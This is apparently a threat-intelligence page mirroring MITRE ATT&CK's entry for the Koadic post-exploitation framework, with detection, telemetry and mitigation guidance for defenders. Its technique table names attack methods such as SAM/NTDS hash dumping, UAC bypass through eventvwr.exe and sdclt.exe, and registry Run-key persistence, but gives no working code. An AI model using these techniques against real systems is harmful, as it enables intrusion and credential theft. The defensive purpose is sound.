S0250: Koadic
Analyst context for executives and security teams
Koadic matters because it is a publicly available Windows post-exploitation framework that can stage payloads, create implants, and operate heavily through Windows Script Host. For leaders, the risk is not the tool name itself; it is whether the organization can see and control script-driven activity after a Windows host is compromised, especially when it leads to credential access, discovery, lateral movement, collection, and command-and-control behaviors mapped by ATT&CK.
Executive priority
Prioritize Koadic as a validation case for Windows endpoint readiness, identity protection, and incident response depth. The ATT&CK relationships connect it to credential access against SAM and NTDS, RDP lateral movement, WMI, scheduled tasks, PowerShell, cmd, Visual Basic, mshta, web-based command and control, tool transfer, and local/share discovery. Executives should ask whether SOC coverage proves these behaviors are logged, triaged, and escalated quickly enough to protect domain credentials, business-critical file shares, and continuity of Windows operations.
Technical view
Koadic is described by MITRE as a Windows post-exploitation and penetration testing framework available on GitHub, with multiple staging and implant options and operations using Windows Script Host. ATT&CK does not provide a dedicated detection section, so detection engineering should be behavior-led across the related techniques: script interpreter execution, mshta abuse, PowerShell/cmd/VB activity, WMI execution, scheduled task creation, DLL injection indicators, credential access attempts against SAM/NTDS, discovery commands, RDP activity, tool transfer, clipboard access, and HTTP/S-style command-and-control patterns. Treat the named group relationships as context for threat intelligence enrichment, not as proof of current activity in any environment.
Likely telemetry
- Windows process creation and command-line logging for wscript/cscript, mshta, powershell, cmd, scheduled task utilities, and WMI-related processes
- PowerShell script block, module, and transcript logs where enabled
- Windows Script Host execution evidence and parent-child process relationships
- WMI operational logs and remote execution indicators
- Task Scheduler operational logs and new or modified scheduled task events
Detection direction
- Build detections around chained behavior rather than the tool name: script host or mshta execution followed by discovery, credential access, tool transfer, or persistence is higher value than isolated script execution.
- Validate coverage for Windows Script Host because MITRE specifically notes Koadic performs most operations using it.
- Tune PowerShell, cmd, VB, WMI, and scheduled task analytics for administrative false positives; require context such as unusual parent process, rare user/host, remote execution, encoded or scripted content, or follow-on discovery.
- Correlate credential access signals involving SAM or NTDS with preceding script execution and subsequent RDP or network share activity.
- Use web command-and-control analytics cautiously: HTTP/S alone is common, so prioritize unusual destinations, rare user agents, beacon-like patterns, or process-to-network relationships tied to script interpreters.
Mitigation priorities
- Harden and monitor Windows Script Host, mshta, PowerShell, WMI, scheduled tasks, and command shell usage according to business need and administrative workflows.
- Reduce credential exposure by protecting domain controllers, restricting access to SAM/NTDS-related material, and monitoring privileged account use.
- Limit lateral movement paths by controlling RDP access, enforcing least privilege, and reviewing where valid accounts can initiate remote sessions.
- Restrict unnecessary script execution and tool transfer from untrusted locations while preserving approved administration use cases.
- Ensure incident response playbooks include rapid scoping for discovery, credential access, persistence through scheduled tasks, and movement to file shares or domain controllers.
Analyst notes and limits
The relationship set is useful because it shows Koadic can be associated with a broad post-exploitation sequence: execution through Windows scripting and command interpreters, discovery, credential access, lateral movement, collection, persistence, and command-and-control. Group relationships include APT28, MuddyWater, Sidewinder, and LazyScripter, but this should be used for intelligence context only unless local evidence supports attribution.
ATT&CK provides no official detection text for this object and no tactics are specified directly on the tool record. The object platform is Windows, so environment-specific validation is required for Windows logging, endpoint controls, and administrative baselines. This take does not infer active exploitation, customer exposure, or guaranteed detection coverage.
Koadic
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1016 | System Network Configuration Discovery | Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain.CitationGithub KoadicCitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1082 | System Information Discovery | Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .CitationGithub Koadic |
| Enterprise | T1218.005 | Mshta Sub-technique | Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.CitationGithub KoadicCitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1055.001 | Dynamic-link Library Injection Sub-technique | Koadic can perform process injection by using a reflective DLL.CitationGithub Koadic |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Koadic can use Regsvr32 to execute additional payloads.CitationGithub Koadic |
| Enterprise | T1033 | System Owner/User Discovery | Koadic can identify logged in users across the domain and views user sessions.CitationGithub KoadicCitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Koadic has used the command |
| Enterprise | T1003.002 | Security Account Manager Sub-technique | Koadic can gather hashed passwords by dumping SAM/SECURITY hive.CitationGithub Koadic |
| Enterprise | T1105 | Ingress Tool Transfer | Koadic can download additional files and tools.CitationGithub KoadicCitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Koadic has used HTTP for C2 communications.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1047 | Windows Management Instrumentation | Koadic can use WMI to execute commands.CitationGithub Koadic |
| Enterprise | T1059.001 | PowerShell Sub-technique | Koadic has used PowerShell to establish persistence.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1115 | Clipboard Data | Koadic can retrieve the current content of the user clipboard.CitationGithub Koadic |
| Enterprise | T1548.002 | Bypass User Account Control Sub-technique | Koadic has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.CitationGithub Koadic |
| Enterprise | T1046 | Network Service Discovery | Koadic can scan for open TCP ports on the target network.CitationGithub Koadic |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | Koadic can enable remote desktop on the victim's machine.CitationGithub Koadic |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1083 | File and Directory Discovery | Koadic can obtain a list of directories.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1003.003 | NTDS Sub-technique | Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.CitationGithub Koadic |
| Enterprise | T1569.002 | Service Execution Sub-technique | |
| Enterprise | T1005 | Data from Local System | Koadic can download files off the target system to send back to the server.CitationGithub KoadicCitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | Koadic can use SSL and TLS for communications.CitationGithub Koadic |
| Enterprise | T1135 | Network Share Discovery | Koadic can scan local network for open SMB.CitationGithub Koadic |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Koadic can use Rundll32 to execute additional payloads.CitationGithub Koadic |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Koadic has used scheduled tasks to add persistence.CitationMalwareBytes LazyScripter Feb 2021 |
Groups, software, and campaigns
G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
G0140: LazyScripter
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
G0121: Sidewinder
Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.[1][2][3]
G0069: MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.0 | Current bundle | 17f5b1145049… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Github Koadic
Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
Open source URL -
[2]
Palo Alto Sofacy 06-2018
Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
Open source URL -
[3]
MalwareBytes LazyScripter Feb 2021
Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
Open source URL -
[4]
Koadic
(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
-
[5]
mitre-attack S0250Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.